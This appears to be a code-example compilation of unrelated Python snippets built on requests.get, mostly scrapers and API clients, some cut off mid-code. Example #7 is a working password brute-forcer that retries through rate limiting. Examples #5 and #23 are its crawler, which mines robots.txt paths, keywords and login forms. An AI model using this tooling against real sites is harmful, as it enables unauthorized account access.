def get_coords_string_from_url(input_string):
    response = get_request(input_string)
    response.raise_for_status()
    coordinate_strings = COORDS_FROM_URL_REGEX.search(response.text)
    if coordinate_strings is None:
        raise ValueError('no coordinate string found in page content')
    return coordinate_strings.group()
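COORDS_FROM_URL_REGEX is referenced above but not defined in this snippet; a hedged sketch of what such a pattern might look like (purely an assumption) is:

import re

# Plausible pattern for a decimal 'lat,lon' pair embedded in page text (an assumption,
# not the project's actual constant).
COORDS_FROM_URL_REGEX = re.compile(r'-?\d{1,3}\.\d+\s*,\s*-?\d{1,3}\.\d+')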
def get_constituency_results(page_url, year, parties=None):
    """
    This method is the main constituency results scraper.
    The constituency page url and election year must be provided.
    A list of dictionaries containing candiate names, parties, and vote tallies is returned.
    """

    # Get page as soup
    request = get_request(page_url)
    request.raise_for_status()
    soup = Soup(request.text, 'html.parser')

    # Find the results table via its caption
    election_table = None
    for caption in soup.find_all('caption'):
        link = caption.find('a')
        if link and re.match('General [Ee]lection {}'.format(year),
                             link.contents[0]):
            election_table = caption.parent
            break

    # Try alternative scraper
    if not election_table:
        return alternative_constituency_results(soup, year, parties)

    # Process results table
    candidates = []
    for candidate in election_table.findChildren('tr', class_='vcard'):

        # Add candidate to list
        candidates.append(get_candidate_from_row(candidate, 3, parties))

    # Return candidates
    return candidates
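A minimal usage sketch of the scraper above; the constituency URL and year are illustrative and `parties` is left at its default:

results = get_constituency_results(
    'https://en.wikipedia.org/wiki/Finchley_and_Golders_Green_(UK_Parliament_constituency)',
    2015)
for candidate in results:
    print(candidate)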
def _get_largest_timeoverlap_subfolder(url, expected_folder, offset=9):
    # Returns the linked subfolder whose start/end times overlap most with expected_folder.
    # `offset` is the position of the '%H%M_%H%M' start/end-time pattern in the folder name;
    # the default (9) matches the standard 'yyyymmdd_HHMM_HHMM' layout.
    f = get_request(url)
    soup = BeautifulSoup(f.text, 'html.parser')

    best_match = ''
    best_overlap = 0
    exp_start = datetime.strptime(expected_folder[offset:offset + 4], "%H%M")
    exp_end = datetime.strptime(expected_folder[offset + 5:offset + 9], "%H%M")
    for a in soup.find_all('a'):
        folder = a.get("href")
        if folder[:offset] != expected_folder[:offset]:
            continue

        start_max = max(exp_start,
                        datetime.strptime(folder[offset:offset + 4], "%H%M"))
        end_min = min(exp_end,
                      datetime.strptime(folder[offset + 5:offset + 9], "%H%M"))
        overlap = (end_min - start_max).total_seconds()
        if overlap > best_overlap and overlap > 0:
            best_match = folder
            best_overlap = overlap
    return best_match
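A hypothetical call: the URL is a placeholder, and folder names are assumed to follow the default 'yyyymmdd_HHMM_HHMM' layout. For an expected folder '20020307_1750_1820', a candidate link '20020307_1745_1815' would score 1500 seconds of overlap (17:50 to 18:15).

best = _get_largest_timeoverlap_subfolder(
    'https://example.com/archive/2002/03/07/', '20020307_1750_1820')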
Example #4
def get_wca_id_from_access_token(access_token):
    """ Returns the user's WCA ID from the /me WCA API endpoint. """

    headers = {"Authorization": "Bearer " + access_token}
    me_data = get_request(__WCA_ME_API_URL, headers=headers).json()

    return me_data['me']['wca_id']
Example #5
def crawl_robots(bfs, url, header_dict, counter, forms, keywords, seen):
    # If the URL doesn't already end with robots.txt (or robots.txt/), append '/robots.txt' before requesting it.
    robots_url = ''
    if url.endswith('robots.txt') or url.endswith('robots.txt/'):
        robots_url = url
    else:
        if url.endswith('/'):
            robots_url = url + 'robots.txt'
        else:
            robots_url = url + '/robots.txt'

    try:
        print('\nTrying robots link: {}'.format(robots_url))
        textfile = get_request(robots_url, {})
    except socket.gaierror:
        print('\nCould not find {}'.format(robots_url))
        return
    split_text = textfile.split('\n')
    allow_disallow = list(
        filter(lambda x: x.startswith('Disallow:') or x.startswith('Allow:'),
               split_text))
    new_links = list(map(lambda x: x.split(' ')[1], allow_disallow))
    appended_links = list(map(lambda x: '{}{}'.format(url, x), new_links))
    for link in appended_links:
        if link not in seen:
            try:
                if bfs:
                    crawl_bfs(link, header_dict, counter, forms, keywords,
                              seen)
                else:
                    crawl_dfs(link, header_dict, counter, forms, keywords,
                              seen)
            except socket.gaierror:
                print('\nCould not find {}'.format(link))
Example #6
 def validate(self, paper_id):
     url_prefix = self.ARXIV_VALIDATE_URL_PREFIX
     if not paper_id.startswith(url_prefix):
         paper_ref = urljoin(url_prefix, paper_id)
     else:
         paper_ref = paper_id
     r = get_request(paper_ref)
     return (r.status_code == 200)
Example #7
def brute_force(user, keywords, forms, user_agent):
    passwords = generate_all_passwords(keywords)
    results = {}
    for form in forms:
        print('\nAttempting to brute-force: ' + form + '\n')
        get_header = {'User-Agent': user_agent}
        html_doc = get_request(form, get_header)
        parser = HTMLParser(html_doc)
        done = False

        for password in passwords:
            if not done:
                login = parser.create_login_string(user, password)
                post = {
                    'User-Agent': user_agent,
                    'Content-Type': 'application/x-www-form-urlencoded',
                    'Content-Length': str(len(login))
                }

                response = post_request(form, post, login)

                if get_status(response) >= 500:
                    print(
                        '\nHold on, too many failed attempts! Waiting for the server to accept more login requests...\n'
                    )

                # Continually retry logging in if there is a server error (too many failed attempts)
                while get_status(response) >= 500:
                    response = post_request(form, post, login)

                combination = 'User: ' + user + '\nPassword: ' + password
                print('Attempting to login...\n' + combination)

                if get_status(response) == 302:
                    print('Login Succeeded!\n')
                    done = True
                    results[form] = combination
                else:
                    print('Login Failed...\n')

        if not done:
            print('Ran out of passwords! Bruteforce failed!')
            results[form] = None

        sleep(
            5
        )  # Temporary pause between forms to see end result of the current form

    # Print bruteforce results
    print('Bruteforcer Results')
    print('-' * 50)
    for form, combination in results.items():
        print('Form: ' + form)
        if combination is None:
            print('Bruteforce Failed')
        else:
            print(combination)
        print()
Example #8
def get_sunrise_sunset_times():
    data = get_request(
        'https://api.sunrise-sunset.org/json?lat=37.983810&lng=23.727539&date=today&formatted=0'
    ).json()['results']

    return {
        'sunset': parse_utc_time_string(data['sunset']),
        'sunrise': parse_utc_time_string(data['sunrise'])
    }
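`parse_utc_time_string` is not shown here; one plausible stand-in (an assumption, given that `formatted=0` makes the API return ISO 8601 timestamps) is:

from datetime import datetime

def parse_utc_time_string(value):
    # e.g. '2015-05-21T05:05:35+00:00' -> timezone-aware datetime (Python 3.7+)
    return datetime.fromisoformat(value)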
Example #9
 def _get(self, path, data={}, key=None, admin=False):
     if not key:
         key = self.api_key if not admin else self.master_api_key
     data = data.copy()
     data['key'] = key
     if path.startswith("/api"):
         path = path[len("/api"):]
     url = "%s/%s" % (self.api_url, path)
     return get_request(url, params=data)
Example #10
 def _get( self, path, data={}, key=None, admin=False ):
     if not key:
         key = self.api_key if not admin else self.master_api_key
     data = data.copy()
     data['key'] = key
     if path.startswith("/api"):
         path = path[ len("/api"): ]
     url = "%s/%s" % (self.api_url, path)
     return get_request( url, params=data )
async def get_fresh_data(repository_url: str,
                         excluded: Iterable) -> AsyncIterator[str]:
    """
    Retrieve a fresh batch of data from the repository.

    Parameters
    ----------
    repository_url: str
        URL for the repository (the zip file).

    excluded: Iterable
        Substrings of paths to skip; any archive member whose path contains
        one of these is excluded from the output.

    Returns
    -------
    AsyncIterator[str]
        An async iterator of relative paths to the extracted files.
    """
    url = BASE_REPOSITORY + repository_url.lstrip(
        processor_settings.URL_SEPARATOR)

    # Requesting the latest files from the repository.
    async with Lock():
        response = get_request(url=url)

        logging.info(f"> Download request completed with "
                     f"status {response.status_code}: {repository_url}")

    if response.status_code != HTTPStatus.OK:
        raise RuntimeError(
            f"Failed to download the data from {url}: {response.text}")

    # `ZipFile` only understands files.
    data_bin = BytesIO(response.content)

    async with Lock():
        with ZipFile(data_bin, mode="r") as zip_obj:
            paths = zip_obj.namelist()

            # Extracting the contents into the temp directory.
            zip_obj.extractall(TEMP_DIR_PATH)
        logging.info("> Successfully extracted and stored the data")

    for path in paths:
        _, filename = split_path(path)

        if any(map(lambda p: p in path, excluded)):
            continue

        full_path = join_path(TEMP_DIR_PATH, path)

        # Discard directories
        if not isfile(full_path):
            continue

        logging.info(f"> Processing file '{path}'")

        yield path
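A hypothetical driver for the async generator above; the repository path and exclusion list are illustrative values, not ones taken from the real pipeline:

import asyncio

async def _demo():
    async for path in get_fresh_data("archive/latest.zip", excluded=(".git",)):
        print(path)

# asyncio.run(_demo())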
Example #12
    def new(cls, url, timeout=5):
        response = get_request(url, timeout=timeout)
        response.raise_for_status()
        text = response.json()

        if not cls.is_unique(text):
            return cls.new(url, timeout)  # someday jokes will end

        return cls(text=text, user=current_user)
Example #13
def get_data():
    execution_date = datetime.today().strftime('%Y-%m-%d')
    execution_date_minus_30 = (datetime.strptime(execution_date, '%Y-%m-%d') -
                               timedelta(days=30)).strftime('%Y-%m-%d')
    dates = [(datetime.strptime(execution_date, '%Y-%m-%d') -
              timedelta(days=day)).strftime('%Y-%m-%d') for day in range(30)]
    response: Response = get_request(
        f'{BASE_URL}/{HISTORY_ENDPOINT}?start_at={execution_date_minus_30}&end_at={execution_date}'
    )
    rates: Dict = response.json().get('rates')
    return rates
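An illustrative follow-up, assuming the `{date: {currency: rate}}` shape implied by the history query above: flatten the mapping into (date, currency, rate) rows.

rows = [(day, currency, rate)
        for day, day_rates in get_data().items()
        for currency, rate in day_rates.items()]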
Example #14
 def recovery_flux_url(self,url):
     """
     Arguments:
         url : string containing the url of the rss feed
     Return :
         BeautifulSoup
     """
     req = get_request(url)
     data = req.text
     soup = BeautifulSoup(data, "lxml")
     return soup
Example #15
def fetch_raw_data(url: str, encoding: str = 'windows-1251') -> Any:
    headers = default_headers()
    headers.update({
        'User-Agent':
        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
    })

    req = get_request(url, headers=headers)
    req.encoding = encoding

    return req
Example #16
def main():
    audioData = open("audio.txt", "w+")
    monitor = PeakMonitor(SINK_NAME, METER_RATE)
    for sample in monitor:
        sample = sample >> DISPLAY_SCALE
        bar = '>' * sample
        spaces = ' ' * (MAX_SPACES - sample)
        #print ' %3d %s%s\r' % (sample, bar, spaces),
        sys.stdout.flush()
        spectrum = [0] * 6
        for i in range(6):
            try:
                spectrum[i] = monitor._samples.get(0)
            except Exception:
                pass

        rgb = int((float(sum(spectrum)) / 400.0) * 100)
        rgb = ('#%02x%02x%02x' % (0, 0, rgb))[1:]

        print(rgb)
        get_request('http://192.168.1.13:8081/' + rgb)
Example #17
    def _get_html_from_url(url: str) -> str:
        response_body = None

        try:
            response: Response = get_request(url)

            content_type = response.headers.get('content-type', '')
            if response.status_code == 200 and content_type.startswith('text/html'):
                if type(response.content) is bytes:
                    response_body = response.content.decode('utf-8')
                else:
                    response_body = response.content
        except RequestException:
            pass

        return response_body
Example #18
def extractor(channel_id):
    extractor.proxies_tmp_list = []
    extractor.proxies = {""}

    html = get_request("https://t.me/s/" + channel_id).content
    soup = BeautifulSoup(html, 'html.parser')
    links = soup.find_all("a")

    for tag in links:
        proxy = tag.get("href", None)

        if proxy is not None and all(
                part in proxy
                for part in ("/proxy?", "&secret=", "&port=", "server=")):
            extractor.proxies.add(proxy)

    extractor.proxies.remove("")
Example #19
 def get(self,
         filename: str,
         offset: int = -1,
         maxlen: int = -1,
         headers: dict = None,
         cookies: dict = None):
     if not headers:
         headers = {}
     if not cookies:
         cookies = {}
     response = get_request(filename, headers=headers, cookies=cookies)
     ret = response.text
     if offset > 0:
         ret = ret[offset:]
     if maxlen > 0:
         ret = ret[:maxlen]
     return ret
Example #20
def _get_best_matching_subfolder(url,
                                 expected_folder,
                                 filter_func=lambda x: True):
    f = get_request(url)
    soup = BeautifulSoup(f.text, 'html.parser')

    best_match = ''
    best_score = 0
    for a in soup.find_all('a'):
        folder = a.get("href")
        if not filter_func(folder):
            continue

        score = _matching_chars(folder, expected_folder)
        if score > best_score:
            best_match = folder
            best_score = score
    return best_match
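`_matching_chars` is referenced but not defined above; a plausible implementation (an assumption, not the project's actual helper) counts the leading characters the two names share:

def _matching_chars(a, b):
    # Count leading characters shared by both strings.
    count = 0
    for ca, cb in zip(a, b):
        if ca != cb:
            break
        count += 1
    return count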
def read_limb_flares(flare_list=DEFAULT_LIMB_FLARE_LOCATION):
    # load data
    if os.path.isfile(flare_list):
        with open(flare_list) as tsv:
            lines = tsv.read().split("\n")
    else:
        lines = get_request(flare_list).text.split("\n")

    flares = []
    for line in lines:
        cell = line.split(
            "\t"
        )  # 1, 2002 Mar 07, 17:50:44, C2.5, -961.5, -176.4, 21.4, 11.6, 5.86, 32.0, 10.1, 4.56, -0.4, 0.77, 12,
        if len(cell) > 2 and cell[0].isnumeric() and len(cell[1]) > 4:
            flares.append(
                datetime.strptime(cell[1] + "T" + cell[2],
                                  "%Y %b %dT%H:%M:%S"))

    return flares
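A worked example of the timestamp parsing above, using the sample row from the inline comment:

from datetime import datetime

datetime.strptime("2002 Mar 07" + "T" + "17:50:44", "%Y %b %dT%H:%M:%S")
# -> datetime.datetime(2002, 3, 7, 17, 50, 44)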
Example #22
def query_osm_results(query_box={'s': 0, 'n': 0, 'w': 0, 'e': 0}, filter_tag_or_tagval=''):
    ''' Query OSM data elements in a given bounding box, including 'relation' elements.
    'relation' elements are used to organize multiple nodes or ways into a larger whole.

    Generates an OSM HTTP request and returns the response in JSON format, e.g.
    http://overpass-api.de/api/interpreter?data=[out:json];node(41.5,-122.0,41.7,-121.6);%3C;out%20meta; '''

    query = "node({s},{w},{n},{e});<;out meta;".format(s=query_box['s'], n=query_box['n'],
                                                       w=query_box['w'], e=query_box['e'])
    url_base = "http://overpass-api.de/api/interpreter?data=[out:json];"
    ''' This call includes:
        - all nodes in the bounding box,
        - all ways that have such a node as member,
        - and all relations that have such a node or such a way as members. '''
    url = url_base + query
    try:
        sleep(0.5)
        req_start_time = time()
        osm_data = get_request(url).json()
        log.info('   Request took %.2f seconds' % (time() - req_start_time))
        if 'elements' in osm_data:
            if filter_tag_or_tagval != '':
                filtered_set = list()
                for itm in osm_data['elements']:
                    if 'tags' in itm:
                        if filter_tag_or_tagval in itm['tags']:
                            filtered_set.append(itm)
                        else:
                            for itag in itm['tags']:
                                if itm['tags'][itag] == filter_tag_or_tagval:
                                    filtered_set.append(itm)
                return filtered_set
            return osm_data['elements']
        else:
            log.warning('no elements found in query_box ' + str(query_box))
            return []
    except ValueError as e:
        log.warning('ValueError for query_box ' + str(query_box) + " | " + str(e))
        return []
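A hypothetical call using the bounding box from the docstring, filtering for elements tagged (or tag-valued) 'power'; both values are illustrative:

elements = query_osm_results(
    query_box={'s': 41.5, 'w': -122.0, 'n': 41.7, 'e': -121.6},
    filter_tag_or_tagval='power')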
Example #23
def process_node(start_url, node, header_dict, forms, keywords, seen, add_next,
                 counter):
    if counter.count >= counter.page_max:
        return

    # Make GET request to the current URL
    html_doc = get_request(node.url, header_dict)
    if html_doc is not None:
        print('Depth ' + str(node.depth) + ': Processing: ' + node.url)
        counter.count += 1

        parser = HTMLParser(html_doc)

        # Extract and add words from current page to the set of keywords
        keywords |= parser.extract_words()

        # If a login form is found, add it to the set
        form_found = parser.detect_login_form()
        if form_found:
            forms.add(node.url)

        # Add reachable URLs from current node if its depth < max depth
        if node.depth < counter.max_depth:
            # Retrieve set of URLs reachable from current node
            linked_urls = parser.extract_urls()

            for url in linked_urls:
                # Reformat if relative url given
                if 'http' not in url:
                    url = reformat_url(url, node.url)

                if url not in seen and url.startswith(start_url):
                    seen.add(url)
                    add_duplicate_url(url, seen)
                    # Traversal dependent function to add next node
                    add_next(url)
    else:
        print('4xx/5xx error at: ' + node.url)
Example #24
def upload():
    image_found = False
    if request.method == 'POST' and request.files['photo']:
        extension = get_image_extension(request.files['photo'])
        print("IMAGE_STUFF: ", request.files['photo'])

        if extension not in ALLOWED_EXTENSIONS:
            flash(
                f"This image extension (.{extension}) is not supported. Upload {' '.join(ALLOWED_EXTENSIONS)} only.",
                "error")
            print(f"ERROR in upload(): The image extension is not supported.")
            return render_template('index.html', user_image=False)

        image = Image.open(request.files['photo'])
        image_found = True

    elif request.method == 'POST' and request.form['text']:
        link = request.form['text']
        extension = link.split('.')[-1].lower()

        if extension not in ALLOWED_EXTENSIONS:
            flash(f"Image URL must end with .png, .jpg or .jpeg", "error")
            print(
                f"ERROR in upload(): The image URL extension is not supported."
            )
            return redirect('/')

        response = get_request(link)
        image = Image.open(BytesIO(response.content))
        image_found = True

    user_image = None
    if image_found:
        user_image = detect_boxes(image)

    return render_template('index.html', user_image=user_image)
Example #25
    cli_parser.add_argument("--test",
                            "-t",
                            help="Send results to stdout",
                            action="store_true")
    cli_parser.add_argument("--simple",
                            "-s",
                            help="Do not gather commute info",
                            action="store_true")

    cli_args = cli_parser.parse_args()

    # Sadly, https://ochdatabase.umd.edu/ doesn't have an API, but its search queries map to URLs consistently,
    # so the simplest way forward is to build a search manually and then copy/paste the URL below, as we have done.
    url = "https://ochdatabase.umd.edu/housing/price-under+2100"
    page = get_request(url)
    soup = BeautifulSoup(page.content, "html.parser")

    search_results = soup.find(id="expo")
    postings = search_results.find_all(
        "article",
        class_=compile_regex(r"^ocp-property-search property-\d?.*"))

    parsed_posts = []
    for post in postings:
        prop = collect_info(post, cli_args.test)

        if prop is not None:
            parsed_posts.append(prop)

    if not parsed_posts:
Example #26
    def resolve_rocket(self, info: ResolveInfo, rocketId):
        response = get_request('{}rockets/{}'.format(spacex_api_url, rocketId))

        return response.json()
Example #27
 
 if fd not in self.client_data:
     self.client_data[fd] = ''
 if len(data) == 0:
     self.c_close(fd, 'empty string recv')
     return
 self.client_data[fd] += data
     
 response = ''
 if len(self.client_data[fd]) > 0:
     request = self.client_data[fd]
     request = request.split('\r\n')
     method = request[0].split(' ')
     host = requests.get_host(request[1])
     if method[0] == 'GET':
         response = requests.get_request(method[1], self.hosts[host],self.media)
     elif method[0] not in self.methods:
         response = requests.bad_request()
     elif method[0] in self.methods:
         response = requests.not_implemented()
     else:
         return
     total_sent = 0
     while total_sent < len(response):
         try:   
             sent = self.clients[fd].send(response[total_sent:])
         except socket.error as e:
             if e.errno in (errno.EAGAIN, errno.EWOULDBLOCK):
                 continue
             else:
                 self.c_close(fd, 'send')
from requests import get as get_request
from bs4 import BeautifulSoup as Soup
import json
import sys

from UKVotingMethods.wiki_scraper import get_constituency_results

# Get parties list
with open('./data/parties.json', encoding='utf-8') as file:
    parties = json.load(file)

# Get constituency list page
request = get_request(
    'https://en.wikipedia.org/wiki/Results_of_the_United_Kingdom_general_election,_2015_by_parliamentary_constituency'
)
request.raise_for_status()
soup = Soup(request.text, 'html.parser')

# Loop over table rows
constituencies = {}
table = soup.find('table', class_='wikitable')
for row in table.findChildren('tr'):

    # Skip header row
    if row.get('valign'):
        continue

    # Skip bottom rows
    if row.get('class'):
        continue
Example #29
def latest_version(user: str, repo: str) -> str:
    from requests import get as get_request
    return get_request(
        f"https://api.github.com/repos/{user}/{repo}/releases/latest").json(
        )["tag_name"]
Example #30
async def get_request(url):
    data = requests.get_request(url)
    return url
Example #31
File: main.py Project: danydlhm/AIS
from keras.layers import Dense, Concatenate, Flatten, UpSampling2D
from keras.models import Model
from os.path import join, exists
from os import makedirs
from requests import get as get_request
from src import logger
# make_yolov3_model and WeightReader (used below) are assumed to come from the
# project's own YOLOv3 utilities, which are not shown in this snippet.

if __name__ == '__main__':
    logger.info("Start process")
    logger.info("Load definition model")
    model = make_yolov3_model()
    weight_path = join('extras','yolov3.weights')
    if not exists(weight_path):
        makedirs('extras', exist_ok=True)
        url = 'https://pjreddie.com/media/files/yolov3.weights'
        r = get_request(url)
        with open(weight_path, 'wb') as f:
            f.write(r.content)
        del r
    logger.info("Load weights")
    weight_reader = WeightReader(weight_path)
    weight_reader.load_weights(model)
    logger.info("End load weights")
    logger.info("Add new layer for project purpose")
    new_outputs = []
    up_sampling = 4
    for output in model.outputs:
        if up_sampling > 1:
            up_sampled_layer = UpSampling2D(up_sampling)(output)
        else:
            up_sampled_layer = output
Example #32
 def resolve_all_launches(self, info: ResolveInfo):
     response = get_request('{}launches/'.format(spacex_api_url))
     return response.json()